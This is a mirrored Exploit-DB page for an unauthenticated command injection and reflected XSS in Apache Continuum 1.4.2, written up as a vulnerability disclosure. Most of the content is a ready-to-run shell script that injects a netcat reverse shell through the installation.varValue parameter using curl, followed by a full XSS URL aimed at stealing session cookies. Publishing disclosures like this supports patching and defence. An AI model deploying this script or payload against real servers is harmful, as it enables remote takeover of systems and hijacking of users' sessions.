bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/java/webapps/39886.txt
Offensive Security 62962d90b0 DB: 2016-06-07 
16 new exploits

Linux Kernel < 2.6.34 (Ubuntu 11.10 x86 & x64) - CAP_SYS_ADMIN Local Privilege Escalation Exploit (2)
Linux Kernel < 2.6.34 (Ubuntu 11.10 x86/x64) - CAP_SYS_ADMIN Local Privilege Escalation Exploit (2)

Linux Kernel  2.4.4 <= 2.4.37.4 / 2.6.0 <= 2.6.30.4 - Sendpage Local Privilege Escalation (Metasploit)
Linux Kernel 2.4.4 <= 2.4.37.4 / 2.6.0 <= 2.6.30.4 - Sendpage Local Privilege Escalation (Metasploit)

Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings
Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root

WordPress Simple Backup Plugin 2.7.11 - Multiple Vulnerabilities
Dream Gallery 1.0 - CSRF Add Admin Exploit
Apache Continuum 1.4.2 - Multiple Vulnerabilities
Sun Secure Global Desktop and Oracle Global Desktop 4.61.915 - ShellShock Exploit
Valve Steam 3.42.16.13 - Local Privilege Escalation
ArticleSetup 1.00 - CSRF Change Admin Password
Electroweb Online Examination System 1.0 - SQL Injection
WordPress WP Mobile Detector Plugin 3.5 - Arbitrary File Upload
WordPress Creative Multi-Purpose Theme 9.1.3 - Stored XSS
WordPress WP PRO Advertising System Plugin 4.6.18 - SQL Injection
WordPress Newspaper Theme 6.7.1 - Privilege Escalation
WordPress Uncode Theme 1.3.1 - Arbitrary File Upload
WordPress Double Opt-In for Download Plugin 2.0.9 - SQL Injection
Notilus Travel Solution Software 2012 R3 - SQL Injection
rConfig 3.1.1 - Local File Inclusion
Nagios XI 5.2.7 - Multiple Vulnerabilities
2016-06-07 05:07:41 +00:00

48 lines
2.6 KiB
Text
Executable file
Raw Blame History

# Exploit Title: Unauthenticated command injection - Apache Continuum
# Google Dork: inurl::8080/continuum/
# Date: 04/06/2016
# Exploit Author: David Shanahan (@cyberpunksec)
# Contact: http://www.procheckup.com/
# Vendor Homepage: https://continuum.apache.org/
# Software Link: https://continuum.apache.org/download.cgi
# Version: 1.4.2
# Tested on: Debian
--- Description ---
Apache Continuum is a continuous integration server for building Java projects https://continuum.apache.org/
ProCheckUp has discovered that Apache Continuum is vulnerable to an unauthenticated command injection attack and reflected XSS.
1) Command injection
Vulnerable URL - http://127.0.0.1:8080/continuum/saveInstallation.action
Vulnerable Parameter - installation.varValue
#!/bin/sh
if [ $# -eq 0 ]
then
echo "$0 <rhost> <rport> <lhost> <lport>"
echo "Remember to set up your netcat listener"
exit 1
fi
cmd="\`nc $3 $4 -e /bin/sh\`"
echo "\n\t[ Apache Continuum <= v1.4.2 CMD Injection ]"
echo "\t\t[ Procheckup - David Shanahan ]\n"
curl http://$1:$2/continuum/saveInstallation.action --data "installation.name=blah&installation.type=jdk&installation.varValue=$cmd"
2) Reflected XSS
The cross site scripting attack works against authenticated users only. An example attack would be to send an authenticated user (let's say the admin) the malicious URL.
If the victim is logged in and accesses the URL, the attacker could steal the victim's session cookie and impersonate them.
Vulnerable URL - http://127.0.0.1:8080/continuum/security/useredit_confirmAdminPassword.action?userAdminPassword=&username=guest&user.username=guest<script>alert(document.cookie)</script>&user.fullName=Guest&user.email=blah@procheckup.com&user.password=password&user.confirmPassword=password&user.timestampAccountCreation=&user.timestampLastLogin=&user.timestampLastPasswordChange=&user.locked=false&user.passwordChangeRequired=false&method:confirmAdminPassword=Submit&cancel=Cancel<http://127.0.0.1:8080/continuum/security/useredit_confirmAdminPassword.action?userAdminPassword=&username=guest&user.username=guest%3cscript%3ealert(document.cookie)%3c/script%3e&user.fullName=Guest&user.email=blah@procheckup.com&user.password=password&user.confirmPassword=password&user.timestampAccountCreation=&user.timestampLastLogin=&user.timestampLastPasswordChange=&user.locked=false&user.passwordChangeRequired=false&method:confirmAdminPassword=Submit&cancel=Cancel>
Fix:
The Apache Continuum project is no longer maintained. Removal of the software is recommended.
http://www.procheckup.com/
Reference in a new issue View git blame Copy permalink